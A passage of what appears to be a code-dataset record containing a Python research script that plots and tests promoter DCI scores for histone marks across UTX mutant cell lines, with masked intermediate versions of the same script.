plt.scatter(dci_df_x.loc[dn_bins,'DCI'],dci_df_y.loc[dn_bins,'DCI'],c='tab:blue',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$<{}$ in WT/Vector'.format(-1*dci_thre))
# save and plot the correlation
x,y = dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI']
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
output_prename = '{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre)
num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_s'] = r_value
num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_p'] = p_value
x_sort = np.sort(x)
plt.plot(x_sort,x_sort*slope+intercept,c = 'k',ls='--',lw=.8)
plt.text(.97,.97,'$r={:.2f}$ '.format(r_value),fontsize=10,transform=plt.axes().transAxes,ha='right',va='top')
plt.axhline(y=0,c='k',lw=1)
plt.axvline(x=0,c='k',lw=1)
# # plt.title('{} over {}'.format(cellType_labels[treatment],cellType_labels[control]))
plt.legend(fontsize=10.5,borderaxespad=0.1,labelspacing=.1,handletextpad=0.1,\
handlelength=1,loc="upper left",markerscale=3,bbox_to_anchor=[-0.12,1.36],frameon=False)
xa,xb = cellType_labels[compr_x.split('_')[0]],cellType_labels[compr_x.split('_')[-1]]
ya,yb = cellType_labels[compr_y.split('_')[0]],cellType_labels[compr_y.split('_')[-1]]
plt.xlabel('DCI score ({} over {})'.format(xa,xb),fontsize=12)
plt.ylabel('DCI score ({} over {})'.format(ya,yb),fontsize=12)
plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,subdir,hm_mark,compr_x,compr_y,suffix,dci_thre),\
bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)
plt.show()
plt.close()
return up_bins,dn_bins
return [],[]
def plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,flag):
test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)
if os.path.isfile(test_file):
box_vals = []
xticklabels = []
sig_vals,sig_colors = [],[]
for compr_col in ['WT_over_Vector','DEL_over_WT','EIF_over_DEL','TPR_over_WT']:
dci_df = return_dci_df(DCI_dir,subdir,hm_mark,compr_col,suffix)
if dci_df is not None:
box_val = dci_df.loc[selected_bins]['DCI'].values
# save the values in box plots
dci_df.loc[selected_bins].to_csv('{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre,compr_col))
s,p = stats.ttest_1samp(box_val,0)
sig_vals.append('*' if p<0.05 else '')
sig_colors.append('b' if s<0 else 'r')
box_vals.append(box_val)
xa,xb = cellType_labels[compr_col.split('_')[0]],cellType_labels[compr_col.split('_')[-1]]
xticklabels.append('{} over {}'.format(xa,xb))
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} s'.format(title.split()[2],compr_col)] = '{:.2f}'.format(s)
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} p'.format(title.split()[2],compr_col)] = '{:.2e}'.format(p)
#print(box_vals)
positions = np.arange(len(box_vals))
fig = plt.figure(figsize=(.46*len(box_vals),2.2))
g = plt.boxplot(box_vals,positions=positions,widths = .5,patch_artist=True,\
boxprops=dict(color='k',facecolor='w',fill=None,lw=1),\
medianprops=dict(color='k'),showfliers=False)
# g = plt.violinplot(box_vals)
# for position_id in np.arange(len(positions)):
# scatter_x = np.random.normal(positions[position_id],0.06,len(box_vals[position_id]))
# plt.scatter(scatter_x,box_vals[position_id],color=color,s=5,zorder=0,alpha=0.6,rasterized=True)
# for compr_pos in [[0,1,'t'],[1,2,'t'],[2,3,'t']]:
# mark_pvalue(compr_pos,positions,box_vals)
plt.axes().set_xticklabels(xticklabels,rotation=30,ha='right',fontsize=12)
plt.ylabel('DCI score'.format(hm_mark),fontsize=13)
# plt.ylim([-1,2])
for ii in positions:
plt.scatter(ii,np.median(box_vals[ii]),marker=sig_vals[ii],color='red',s=77)
# plt.axes().text(ii,0,sig_vals[ii-1],fontsize=28,va='top',ha='center',color='red')
plt.axhline(y=0,c='k',lw=1)
plt.title(title,fontsize=12)
# plt.legend(fontsize=16,borderaxespad=0.2,labelspacing=.2,handletextpad=0.2,handlelength=1,loc="upper right",frameon=False)
plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre),\
bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)
plt.show()
plt.close()
# ==== main()
cellType_labels= {'Vector':'Vector',\
'WT':'WT',\
'DEL':'$\Delta$cIDR',\
'EIF':'UTX-eIF$_{IDR}$',\
'TPR':'$\Delta$TPR',\
'MT2':'MT2',\
'FUS':'UTX-FUS$_{IDR}$'}
outdir = 'f4_promoter_DCI_scatter'
os.makedirs(outdir,exist_ok=True)
# project_dir="/nv/vol190/zanglab/zw5j/since2019_projects/UTX_HaoJiang"
project_dir="/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang"
# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f2_DEG_promoter_DCI_non_normalized/f1_promoter_DCI_rename'.format(project_dir)
DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'.format(project_dir)
# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f0_run_bart3d_new/bart3d_DCI_rename'.format(project_dir)
# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/f1_deseq2_out'.format(project_dir)
# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/fz_deseq2_out_combined'.format(project_dir)
# deg_df = pd.read_csv('{}/deseq2_combined.csv'.format(expr_dir),index_col=0)
subdirs=['bart3d_dis200k_data_1st_submit','bart3d_dis200k_data202008',
'bart3d_dis500k_data_1st_submit','bart3d_dis500k_data202008']
compr_types = [['WT_over_Vector','DEL_over_WT'],['DEL_over_WT','EIF_over_DEL'],['WT_over_Vector','TPR_over_WT']]
hm_marks = ['H3K4me3','H3K27ac']
suffixes=['_promoter_DCI']
dci_thres = [2,5]
num_DCI_bins_df = pd.DataFrame()
for subdir in subdirs[1:2]:
outdir_tmp='{}/{}'.format(outdir,subdir)
os.makedirs(outdir_tmp,exist_ok=True)
for hm_mark in hm_marks[:]:
for suffix in suffixes[:]:
for dci_thre in dci_thres[1:]:
for compr_type in compr_types[:]:
up_bins,dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre)
# the box plot are exactly the same
if compr_type[1]=='DEL_over_WT':
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# up genes'] = len(up_bins)
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# dn genes'] = len(dn_bins)
##### box plot
selected_bins = up_bins
color = 'tab:red'
title = 'Genes w/ DCI$>{}$ \n in WT over Vector'.format(dci_thre)
plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'increased')
selected_bins = dn_bins
color = 'tab:blue'
title = 'Genes w/ DCI$<{}$ \n in WT over Vector'.format(-1*dci_thre)
plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'decreased')
num_DCI_bins_df.to_csv(outdir+os.sep+'num_DCI_promoter_summary.csv')
|
normal
|
{
"blob_id": "4ee47435bff1b0b4a7877c06fb13d13cf53b7fce",
"index": 3910,
"step-1": "<mask token>\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\nsns.set(font_scale=1.1)\nsns.set_style('whitegrid', {'axes.grid': False})\nsns.set_style('ticks', {'ytick.color': 'k', 'axes.edgecolor': 'k'})\n<mask token>\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\n<mask token>\nos.makedirs(outdir, exist_ok=True)\n<mask token>\nfor subdir in subdirs[1:2]:\n outdir_tmp = '{}/{}'.format(outdir, subdir)\n os.makedirs(outdir_tmp, exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins, dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,\n subdir, hm_mark, compr_type, suffix, dci_thre)\n if compr_type[1] == 'DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# up genes'] = len(\n up_bins)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# dn genes'] = len(\n dn_bins)\n selected_bins = up_bins\n color = 'tab:red'\n title = ('Genes w/ DCI$>{}$ \\n in WT over Vector'.\n format(dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'increased')\n selected_bins = dn_bins\n color = 'tab:blue'\n title = ('Genes w/ DCI$<{}$ \\n in WT over Vector'.\n format(-1 * dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'decreased')\nnum_DCI_bins_df.to_csv(outdir + os.sep + 'num_DCI_promoter_summary.csv')\n",
"step-3": "<mask token>\nmatplotlib.rcParams['font.size'] = 11\n<mask token>\nsns.set(font_scale=1.1)\nsns.set_style('whitegrid', {'axes.grid': False})\nsns.set_style('ticks', {'ytick.color': 'k', 'axes.edgecolor': 'k'})\nmatplotlib.rcParams['font.sans-serif'] = ['Arial']\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams['mathtext.rm'] = 'Arial'\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\ncellType_labels = {'Vector': 'Vector', 'WT': 'WT', 'DEL': '$\\\\Delta$cIDR',\n 'EIF': 'UTX-eIF$_{IDR}$', 'TPR': '$\\\\Delta$TPR', 'MT2': 'MT2', 'FUS':\n 'UTX-FUS$_{IDR}$'}\noutdir = 'f4_promoter_DCI_scatter'\nos.makedirs(outdir, exist_ok=True)\nproject_dir = '/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang'\nDCI_dir = (\n '{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'\n .format(project_dir))\nsubdirs = ['bart3d_dis200k_data_1st_submit', 'bart3d_dis200k_data202008',\n 'bart3d_dis500k_data_1st_submit', 'bart3d_dis500k_data202008']\ncompr_types = [['WT_over_Vector', 'DEL_over_WT'], ['DEL_over_WT',\n 'EIF_over_DEL'], ['WT_over_Vector', 'TPR_over_WT']]\nhm_marks = ['H3K4me3', 'H3K27ac']\nsuffixes = ['_promoter_DCI']\ndci_thres = [2, 5]\nnum_DCI_bins_df = pd.DataFrame()\nfor subdir in subdirs[1:2]:\n outdir_tmp = '{}/{}'.format(outdir, subdir)\n os.makedirs(outdir_tmp, exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins, dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,\n subdir, hm_mark, compr_type, suffix, dci_thre)\n if compr_type[1] == 'DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# up genes'] = len(\n up_bins)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# dn genes'] = len(\n dn_bins)\n selected_bins = up_bins\n color = 'tab:red'\n title = ('Genes w/ DCI$>{}$ \\n in WT over Vector'.\n format(dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'increased')\n selected_bins = dn_bins\n color = 'tab:blue'\n title = ('Genes w/ DCI$<{}$ \\n in WT over Vector'.\n format(-1 * dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'decreased')\nnum_DCI_bins_df.to_csv(outdir + os.sep + 'num_DCI_promoter_summary.csv')\n",
